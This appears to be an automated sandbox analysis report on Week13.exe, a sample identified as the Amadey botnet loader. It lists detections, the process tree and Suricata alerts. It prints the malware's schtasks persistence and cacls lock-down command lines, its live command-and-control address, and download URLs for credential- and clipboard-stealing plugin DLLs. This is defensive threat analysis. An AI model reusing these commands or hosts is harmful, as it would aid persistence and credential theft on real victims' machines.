Windows Analysis Report
Week13.exe

Overview

General Information

Sample name: Week13.exe
Analysis ID: 1561581
MD5: a1b8fa53a47b1991ee76a46ee8685b7d
SHA1: 4002a9cffcde9f7f44633457457792564a63bf5d
SHA256: e472fd69b5a891059f44206124baf829cb7583890e2c8e288e311359a2249871

Detection

Amadey
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey bot
Yara detected Amadeys stealer DLL
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
Machine Learning detection for sample
Uses schtasks.exe or at.exe to add and modify task schedules
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses cacls to modify the permissions of files

Classification

  • System is w10x64
  • Week13.exe (PID: 4712 cmdline: "C:\Users\user\Desktop\Week13.exe" MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
    • oneetx.exe (PID: 6160 cmdline: "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
      • schtasks.exe (PID: 6592 cmdline: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F MD5: 48C2FE20575769DE916F48EF0676A965)
        • conhost.exe (PID: 1252 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5024 cmdline: "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "user:N"&&CACLS "oneetx.exe" /P "user:R" /E&&echo Y|CACLS "..\cb7ae701b3" /P "user:N"&&CACLS "..\cb7ae701b3" /P "user:R" /E&&Exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5332 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cacls.exe (PID: 2276 cmdline: CACLS "oneetx.exe" /P "user:N" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
        • cacls.exe (PID: 6584 cmdline: CACLS "oneetx.exe" /P "user:R" /E MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
        • cmd.exe (PID: 5008 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo Y" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • cacls.exe (PID: 6628 cmdline: CACLS "..\cb7ae701b3" /P "user:N" MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
        • cacls.exe (PID: 1120 cmdline: CACLS "..\cb7ae701b3" /P "user:R" /E MD5: 00BAAE10C69DAD58F169A3ED638D6C59)
  • oneetx.exe (PID: 3788 cmdline: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
  • oneetx.exe (PID: 5068 cmdline: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
  • oneetx.exe (PID: 4204 cmdline: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
  • oneetx.exe (PID: 5820 cmdline: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
  • oneetx.exe (PID: 6464 cmdline: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe MD5: A1B8FA53A47B1991EE76A46EE8685B7D)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution | | https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
{"C2 url": "193.3.19.154/store/games/index.php", "Version": "3.80", "Install Folder": "cb7ae701b3", "Install File": "oneetx.exe"}
Source | Rule | Description | Author | Strings
Week13.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
dump.pcap | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |
C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000000.00000000.2018110902.0000000000611000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000010.00000000.2659622976.0000000000891000.00000020.00000001.01000000.00000008.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000000.00000002.2024090733.0000000000611000.00000020.00000001.01000000.00000003.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
00000001.00000002.4482643286.0000000000D36000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Amadey | Yara detected Amadey bot | Joe Security |
00000011.00000000.3258747374.0000000000891000.00000020.00000001.01000000.00000008.sdmp | JoeSecurity_Amadey_2 | Yara detected Amadey's stealer DLL | Joe Security |
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F, CommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe", ParentImage: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe, ParentProcessId: 6160, ParentProcessName: oneetx.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe" /F, ProcessId: 6592, ProcessName: schtasks.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-23T20:52:56.688685+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50036 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:04.143083+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49705 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:08.382363+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49706 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:12.626323+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49707 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:16.860879+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49709 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:21.095201+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49712 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:25.313904+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49722 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:29.579693+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49733 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:33.829480+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49741 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:38.073084+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49752 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:42.313889+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49764 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:46.532660+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49775 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:50.782734+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49787 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:55.042480+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49794 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:59.298221+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49804 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:03.548223+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49815 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:07.798356+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49826 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:12.048318+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49837 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:16.282841+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49848 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:20.533150+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49859 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:24.851912+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49867 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:29.157698+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49878 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:33.560630+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49887 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:37.814020+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49898 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:42.064285+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49909 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:46.314044+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49920 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:50.563900+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49930 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:54.816557+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49940 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:57.550787+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49950 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:01.782905+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49958 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:06.032766+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49967 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:10.291064+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49976 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:14.517087+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49987 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:18.770958+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49998 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:23.026943+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50009 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:27.284604+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50016 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:31.534796+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50017 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:35.782914+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50018 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:40.001425+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50019 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:44.236221+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50020 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:48.526834+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50021 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:52.784639+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50022 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:57.136097+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50023 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:01.438981+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50024 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:05.680904+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50025 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:09.923228+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50026 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:14.164217+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50027 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:18.455177+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50028 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:22.706673+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50029 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:26.956810+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50030 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:31.204734+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50031 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:35.454542+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50032 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:39.694587+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50033 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:43.907721+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50034 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:48.157989+0100 | 2027700 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 50035 | 193.3.19.154 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-23T20:52:56.688685+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50036 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:04.143083+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49705 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:08.382363+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49706 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:12.626323+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49707 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:16.860879+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49709 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:21.095201+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49712 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:25.313904+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49722 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:29.579693+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49733 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:33.829480+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49741 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:38.073084+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49752 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:42.313889+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49764 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:46.532660+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49775 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:50.782734+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49787 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:55.042480+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49794 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:59.298221+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49804 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:03.548223+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49815 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:07.798356+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49826 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:12.048318+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49837 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:16.282841+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49848 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:20.533150+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49859 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:24.851912+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49867 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:29.157698+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49878 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:33.560630+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49887 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:37.814020+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49898 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:42.064285+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49909 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:46.314044+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49920 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:50.563900+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49930 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:54.816557+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49940 | 193.3.19.154 | 80 | TCP
2024-11-23T20:54:57.550787+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49950 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:01.782905+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49958 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:06.032766+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49967 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:10.291064+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49976 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:14.517087+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49987 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:18.770958+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 49998 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:23.026943+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50009 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:27.284604+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50016 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:31.534796+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50017 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:35.782914+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50018 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:40.001425+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50019 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:44.236221+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50020 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:48.526834+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50021 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:52.784639+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50022 | 193.3.19.154 | 80 | TCP
2024-11-23T20:55:57.136097+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50023 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:01.438981+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50024 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:05.680904+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50025 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:09.923228+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50026 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:14.164217+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50027 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:18.455177+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50028 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:22.706673+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50029 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:26.956810+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50030 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:31.204734+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50031 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:35.454542+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50032 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:39.694587+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50033 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:43.907721+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50034 | 193.3.19.154 | 80 | TCP
2024-11-23T20:56:48.157989+0100 | 2045751 | 1 | A Network Trojan was detected | 192.168.2.5 | 50035 | 193.3.19.154 | 80 | TCP
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-23T20:53:04.143141+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49704 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:12.626276+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49708 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:21.095122+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49714 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:29.579645+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49735 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:38.073133+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49754 | 193.3.19.154 | 80 | TCP
2024-11-23T20:53:46.532797+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49776 | 193.3.19.154 | 80 | TCP

AV Detection

Source: Week13.exe | Avira: detected
Source: http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ=N | Avira URL Cloud: Label: malware
Source: http://193.3.19.154/store/games/index.phpc | Avira URL Cloud: Label: malware
Source: http://193.3.19.154/store/games/index.phpd | Avira URL Cloud: Label: malware
Source: http://193.3.19.154/store/games/index.phppdR | Avira URL Cloud: Label: malware
Source: http://193.3.19.154/store/games/index.phppd | Avira URL Cloud: Label: malware
Source: http://193.3.19.154/store/games/index.phpe5a2ab05 | Avira URL Cloud: Label: malware
Source: http://193.3.19.154/store/games/index.php | Avira URL Cloud: Label: malware
Source: http://193.3.19.154/store/games/Plugins/cred64.dllx | Avira URL Cloud: Label: malware
Source: http://193.3.19.154/store/games/Plugins/cred64.dll | Avira URL Cloud: Label: malware
Source: http://193.3.19.154/store/games/index.php1mb3JtLXVybGVuY29kZWQ= | Avira URL Cloud: Label: malware
Source: http://193.3.19.154/store/games/Plugins/clip64.dllYS2 | Avira URL Cloud: Label: malware
Source: http://193.3.19.154/store/games/index.phpt | Avira URL Cloud: Label: malware
Source: http://193.3.19.154/store/games/index.phpded | Avira URL Cloud: Label: malware
Source: http://193.3.19.154/store/games/Plugins/clip64.dll | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Avira: detection malicious, Label: HEUR/AGEN.1317762
Source: Week13.exe | Malware Configuration Extractor: Amadey {"C2 url": "193.3.19.154/store/games/index.php", "Version": "3.80", "Install Folder": "cb7ae701b3", "Install File": "oneetx.exe"}
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | ReversingLabs: Detection: 91%
Source: Week13.exe | ReversingLabs: Detection: 91%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\cb7ae701b3\oneetx.exe | Joe Sandbox ML: detected
Source: Week13.exe | Joe Sandbox ML: detected
Source: Week13.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Week13.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: Week13.exe, oneetx.exe.0.dr

Networking

Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49733 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49712 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49712 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49733 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49815 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49815 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49804 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49764 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49706 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49706 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49709 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49709 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49804 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2027700 - Severity 1 - ET MALWARE Amadey CnC Check-In : 192.168.2.5:49787 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49764 -> 193.3.19.154:80
Source: Network traffic | Suricata IDS: 2045751 - Severity 1 - ET MALWARE Win32/Amadey Bot Activity (POST) M2 : 192.168.2.5:49787 -> 193.3.19.154:80
